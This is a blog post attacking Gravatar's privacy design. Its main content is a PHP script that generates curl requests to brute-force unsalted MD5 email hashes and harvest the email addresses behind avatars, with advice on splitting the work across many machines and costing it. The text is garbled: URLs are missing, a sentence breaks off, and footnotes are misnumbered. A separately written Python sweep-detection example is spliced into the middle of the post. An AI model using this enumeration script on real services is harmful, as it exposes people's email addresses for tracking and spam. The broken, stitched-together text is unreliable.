Gravatar still sucks

Tuesday, 05 May, Year 7 d.Tr. | Author: Mircea Popescu

Let's begin with a picture - they're worth ten thousand emails from what I hear.


Yes, if you see your Gravatar image there it means I have your email now. Because Gravatar sucks, just like Automattic sucks, just like Disqus sucks, just like the entire bezzle-powered world sucks.

Unlike the previously announced attacks[i], I simply used the following script to generate curl queries :

    $alph = array ("a", "b", "c", "d", "e", "f", "g", "h", "i", "j",
    "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w",
    "x", "y", "z", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0");
    // google uses a braindamaged private spec [ii]
    for ($i = 0; $i <= 1700000; $i++) { // upper bound: see [iii]
        // encode $i in base 36 using the alphabet above
        $over = $i;
        $mant = $over % 36;
        $string = $alph[$mant];
        while ($over > 0) {
          $over = floor($over / 36);
          $mant = $over % 36;
          if ($mant+$over > 1) $string .= $alph[$mant];
        }
        echo "curl -o ".$string.".jpg"
            ,md5($string.""),"?s=32 \n";
        // periodic cleanup of default-image responses: see [iv]
        if ($i % 1000 == 135) echo "find . -size 1258c -delete\n
            find . -size 1267c -delete\n";
    }

If you host this on a server somewhere, you can have workers periodically connect to acquire a job chunk[v] through something as trivial as

    curl http://some.domain/script.php >

That bash script can then be executed, leaving behind a list of good hits (which you don't even have to retrieve, all you really need is a directory list). A half decent machine should be able to pull something like 50-100 links per second, which means that if you have say ten thousand available you can explore the entire space of one to six characters in a little over an

The approach has some advantages : it will verify emails (or, or whatever else you may care to check), and associate them with a Gravatar whether they were actually ever used on any website or not[vii]. Unlike the method described by Bongard et al., it also won't miss anything.[viii] In exchange, it's probably slow - don't expect much more than a few dozen hits per million tries.[ix]
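Seen from the avatar server's side, a sweep like the one above has a recognisable shape : a single client pulling hashes at tens of requests per second and almost always receiving the default image. The following is an added example, not code from the original post, that runs a simple profile over a constructed access log (the log format, the client addresses and the candidate emails are all assumed here) and flags clients whose request rate and default-image ratio both exceed a threshold, using the 1258 and 1267 byte default-response sizes the post reports.

```python
import hashlib
import re
from collections import defaultdict

# Body sizes of Gravatar's "no such avatar" responses, as observed in the post.
DEFAULT_SIZES = {1258, 1267}
# Assumed (constructed) log format: ip - [unix_ts] "GET /avatar/<md5>?s=<n>" status bytes
LINE = re.compile(r'^(\S+) - \[(\d+)\] "GET /avatar/([0-9a-f]{32})\?s=(\d+)" (\d{3}) (\d+)$')

def build_sample_log():
    """Constructed sample: one ordinary client, one client sweeping candidate hashes."""
    lines = []
    for i, email in enumerate(["alice@example.com", "bob@example.com"]):
        h = hashlib.md5(email.encode()).hexdigest()
        lines.append(f'198.51.100.7 - [{1000 + 30 * i}] "GET /avatar/{h}?s=80" 200 {4000 + i}')
    for i in range(300):
        h = hashlib.md5(f"cand{i}".encode()).hexdigest()
        size = 3500 if i % 100 == 0 else (1258 if i % 2 else 1267)  # 3 real hits, 297 misses
        lines.append(f'203.0.113.9 - [{1000 + i // 60}] "GET /avatar/{h}?s=32" 200 {size}')
    return lines

def profile(lines):
    """Per-client request count, default-image ('miss') count and first/last timestamp."""
    stats = defaultdict(lambda: {"n": 0, "miss": 0, "t0": None, "t1": None})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, _h, _size_param, _status, nbytes = m.groups()
        s = stats[ip]
        ts = int(ts)
        s["n"] += 1
        s["miss"] += int(nbytes) in DEFAULT_SIZES
        s["t0"] = ts if s["t0"] is None else min(s["t0"], ts)
        s["t1"] = ts if s["t1"] is None else max(s["t1"], ts)
    return dict(stats)

def flag_enumerators(lines, min_rate=5.0, min_miss_ratio=0.9):
    """Clients that hammer the avatar endpoint and almost only ever get the default image."""
    flagged = []
    for ip, s in profile(lines).items():
        rate = s["n"] / (s["t1"] - s["t0"] + 1)   # requests per second over the client's span
        miss_ratio = s["miss"] / s["n"]
        if rate >= min_rate and miss_ratio >= min_miss_ratio:
            flagged.append(ip)
    return sorted(flagged)

if __name__ == "__main__":
    print(flag_enumerators(build_sample_log()))   # ['203.0.113.9']
```

The thresholds are deliberately crude; the point is that a high miss ratio, not the raw request rate alone, is what separates a sweep from a busy but legitimate embedder.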

Please stop empowering idiots, con men and government agents. Especially if you, like me, don't particularly enjoy living in a world populated by idiots, con men and government agents.

  1. One Dominique Bongard had the idea of sniffing up all the gravatars displayed on some random French website. Since the gravatar image is linked through a snippet of html that looks something like
      <img src=></img>

    and since they have to be included on the page to be visible, it's trivial to gather a sizable collection by merely browsing the web.

    The first string in that url is a plain unsalted (remember Fetlife ?) md5 hash of the corresponding email, which is not really all that hard to break, using something like hashcat's hybrid algorithms. With the advent of Bitcoin and the exponential increase in worldwide hashing power it has driven, it should come as no surprise that Bongard managed to retrieve the emails out of something like 40% of the hashes he collected.

    This obviously has very real implications in the third world country of France. Given its appalling record of human rights violations (merely expressing certain verboten opinions is grounds for conviction in that God-forsaken shithole, not to mention trivialities like taking a paternity test, or lying about your age), having one's email leaked in this manner readily compares to having one's radio transmission triangulated by the Gestapo, or having one's typewriter identified as the source of самиздат.

    We should probably observe a moment of silence for all the innocent men and women Gravatar slaughtered, maliciously or ineptly as the case may be.

  2. Capitals are ignored, dots are ignored, etc.
  3. Enough to cover four character emails, but the number is obviously arbitrary.
  4. This line cleans up the directory periodically. It so happens that the gravatar fail hits come in two flavours, one 1`267 bytes long, the other 1`258 bytes long. Why exactly two is perhaps a mystery for another book.
  5. You will need some mechanism to increment the job chunks as they're doled out, obviously.
  6. 36^6 = 2`176`782`336 candidates ; 2`176`782`336 / 50 / 3600 / 10000 ~= 1.20 hours, or 72 minutes.
  7. Of course if they were ever used, each instance can then be located (through a service like Google's own image search, or any of the competitors').
  8. Speaking of which, don't you think it's a little strange that banal stuff like a program to scarf up all gravatar-email pairs and track them around the web was not included in the wikileaks/Snowden revelations, while all sorts of patently ridiculous kookware is included ? That little ? Only that little ?
  9. Then again, computers are cheap these days - a whole month's worth of 50/second (~5 mn tries or so) shouldn't run one over a hundred dollars, probably ten being closer to the norm - which would put the cost of acquiring emails in this manner at a few pennies per. Spammers sell "quality" email lists for about an order of magnitude less than that, so it's probably not (or marginally not) an economic process to generate spamlists. Yet.

    This is important : Gravatar, through its ridoinculous unsalted md5 "technologies", sets the bar of your privacy at the level of "marginally not economical to harvest for spam". Why do you want anything to do with these assholes again ?

Category: Meta psihoza

6 Responses

  1. Hi :)

    Mircea Popescu 
    Sunday, 10 May 2015

    What's new with you, you dear!

  3. Good evening, well, I won't say anything more... I slave away in silence!

    Mircea Popescu 
    Tuesday, 12 May 2015

    They say silence is a sign of wisdom, you.

  5. Implementing this using something such as libcurl for extra speed is left as an exercise for the little "hackers" out there. :P

    Mircea Popescu 
    Thursday, 21 May 2015

